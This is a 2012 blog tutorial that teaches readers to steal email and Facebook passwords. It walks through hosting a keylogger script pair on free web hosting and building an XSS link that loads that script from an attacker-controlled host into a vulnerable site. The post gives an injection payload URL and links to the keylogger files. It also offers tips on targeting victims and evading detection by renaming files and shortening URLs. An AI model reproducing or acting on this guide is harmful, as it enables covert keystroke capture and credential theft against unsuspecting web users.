Blogger Widgets Blogger Widgets

Monday, June 25, 2012

Facebook Hacking : Hack Email Account Password Using XSS Keylogger

Hello friends, today in this article I am going to share something new trick to hack email account password and I don't think many people are aware of this trick.

Anyway, this tutorial will show you how to turn a vulnerable website into a keylogger that will log all keypresses once the slave has clicked on our poisoned link and types on the webpage.

You need to have a website that is vulnerable to XSS injection. For more information about XSS Tutorial for Website Hacking.



Don’t forget to Subscribe to our RSS feed

Facebook Hacking : Hack Email Account Password Using XSS Keylogger

Follow the following steps to setup XSS Keylogger

Step 1: First thing we need to do is to create some web hosting. We need a host to host our keylogging script on it and this is what will be included in the poisoned url that we will send to people.

here I am using hosting.eu.pn because they don't seem to suspend accounts but you can use any host like 00webhost etc.

facebook password hacking

Ok so if you don't have an account already click "SIGN UP" otherwise click login at the top.

Step 2: Next select free hosting and click continue.

facebook password hacking
Step 3: Select sign up.

facebook password hacking

A new form will appear, now just fill in some fake info but you need a real email address to active the account. Check the "I agree to the terms" box and click continue.

facebook password hacking

Now that should be done, you just need to wait for an activation email to login then your account will be active.

Step 4: Once you have logged in click "website manager" at the top of the page.

facebook password hacking

Now click "File manager".

facebook password hacking

There will be two different type: lite and advanced but we can just use the lite file manager.

Step 5: Now you will see all the files of your web site, I have done mine in a different folder to make things look neat but you can just do it in the home directory.

At the bottom you should see the name of your site, click on that.

facebook password hacking

Now we need to upload our files, so click on "browse" and select our two files logger.php and logger.js

Download logger.php and logger.js files

facebook password hacking

Next we click on "Upload File(s)".

We also need a file for the keylogs to be written to, for this we will call it data.txt

Scroll down and in the create new file name box put "data.txt" and the click "Create File".

Remember all the files must be in the same folder!

facebook password hacking
Step 6: Now we need to click on the edit button to the left hand side of the file next to save and delete. You can do this before you upload it in notepad or something.

facebook password hacking

Open the logger.js file and we need to edit the url to be the url to the php logger script.

The javascript is the file we will include in the poisoned url this will run and catch each keypress, it will then send them to the php script on our host that will right to the data.txt file. You can see how useful XSS can be.

Now we just need to set the permissions so all the files can work correctly.

facebook password hacking

Select all the files and set the permissions to 777 and click "set".

Step 7: Now the setup is complete, all we have to do now is create our poisoned url using our vulnerable site, like this example below.

Code:
http://target.com/search.php?keywords=<script src="http://malicious-site.com/keylogger.js"></script>

As you can see our website has been inserted into the link of the vulnerable site. Now if someone clicks on that link everything they type in on that page will go to the data.txt file.

Here's an example below.

facebook password hacking

As you can see the url bar has our malicious link in it, at the bottom of the page Firefox shows us what sites we are connecting with. It says we are accepting scripts from eu.pn which is where our keylogger is hosted.

Notice at the top right hand corner of the page there is a search bar, I type in there "hi there!", now we check our data.txt on our site...

facebook password hacking

And there you have it, it works!

Note : There's a few things you need to bare in mind when using this.
  • The website has to be vulnerable to XSS injection for it to work.
  • The timer in the javascript logger is set to 1 second but you can set this to anything you want. The keylogger actually records capital letters and other special character keys.
  • Also this is meant for targeted attacks not for mass spreading as all the logs would get to jumbled up.
  • A problem is that if someone leaves the page then you won't be able to receive logs any more.
  • Also remember that the person can see the url so try renaming files to like "search.js" etc. or using goo.gl to shorten urls to prevent being detected.

Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,

So friends, I hope you will like this article and hopefully you will have learnt something from this and will have a better understanding of how cross site scripting works. If you need any help then post a comment and I will help you out.

HaPPy hAcKiNg.............



source : http://www.wildhacker.com

No comments:

Post a Comment